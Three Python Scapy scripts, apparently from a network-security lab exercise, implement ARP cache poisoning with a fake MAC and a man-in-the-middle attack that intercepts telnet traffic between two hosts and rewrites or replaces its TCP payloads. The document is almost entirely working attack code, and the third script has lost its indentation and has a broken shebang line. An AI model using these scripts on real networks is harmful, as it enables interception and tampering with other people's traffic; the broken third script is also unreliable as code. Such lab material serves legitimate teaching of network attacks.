from scapy.all import *

B = "10.0.2.6"
Fake_MAC = "12:34:56:78:9A:BC"

E_layer = Ether()
E_layer.dst = "ff:ff:ff:ff:ff:ff"

A_layer = ARP()
A_layer.op = 2
A_layer.hwdst = "ff:ff:ff:ff:ff:ff"
A_layer.hwsrc = Fake_MAC
A_layer.psrc = B
A_layer.pdst = B

pkt = E_layer / A_layer

pkt.show()
sendp(pkt, verbose=True)









from scapy.all import *

# ... imports, initialization of addresses and Step 1 (refer to full code) ...

def tcp_spoof_pkt_telnet(pkt):
    if pkt.haslayer(Ether) and pkt.haslayer(IP) and pkt.haslayer(TCP):
        if pkt[Ether].src != M_mac:
            if pkt[IP].src == A and pkt[IP].dst == B:
                print("From A to B")
                pkt[Ether].src = M_mac
                pkt[Ether].dst = B_mac

                # Handle and replace payload
                if pkt[TCP].payload:
                    try:
                        data = pkt[TCP].payload.load.decode("utf-8")
                        del pkt[TCP].payload
                        del pkt[TCP].chksum
                        pkt[TCP] /= 'Z'  # Replace with 'Z'
                    except UnicodeDecodeError:
                        print("Payload not UTF-8 decodable")

                sendp(pkt, verbose=False)

            elif pkt[IP].src == B and pkt[IP].dst == A:
                print("From B to A")
                pkt[Ether].src = M_mac
                pkt[Ether].dst = A_mac
                sendp(pkt, verbose=False)  # Forward the original packet

# Step 4: Launch MITM attack
pkt = sniff(filter='tcp', prn=tcp_spoof_pkt_telnet)








!/usr/bin/env python3
from scapy.all import *
IP_A = "10.9.0.5"
MAC_A = "02:42:0a:09:00:05"
IP_B = "10.9.0.6"
MAC_B = "02:42:0a:09:00:06"
def spoof_pkt(pkt):
if pkt[IP].src == IP_A and pkt[IP].dst == IP_B:
# Create a new packet based on the captured one.
# 1) We need to delete the checksum in the IP & TCP headers,
# because our modification will make them invalid.
# Scapy will recalculate them if these fields are missing.
# 2) We also delete the original TCP payload.
newpkt = IP(bytes(pkt[IP]))
del(newpkt.chksum)
del(newpkt[TCP].payload)
del(newpkt[TCP].chksum)
#################################################################
# Construct the new payload based on the old payload.
# Students need to implement this part.
if pkt[TCP].payload:
data = pkt[TCP].payload.load # The original payload data
newdata = data # No change is made in this sample code
send(newpkt/newdata)
else:
send(newpkt)
################################################################
elif pkt[IP].src == IP_B and pkt[IP].dst == IP_A:
# Create new packet based on the captured one
# Do not make any change
newpkt = IP(bytes(pkt[IP]))
del(newpkt.chksum)
del(newpkt[TCP].chksum)
send(newpkt)


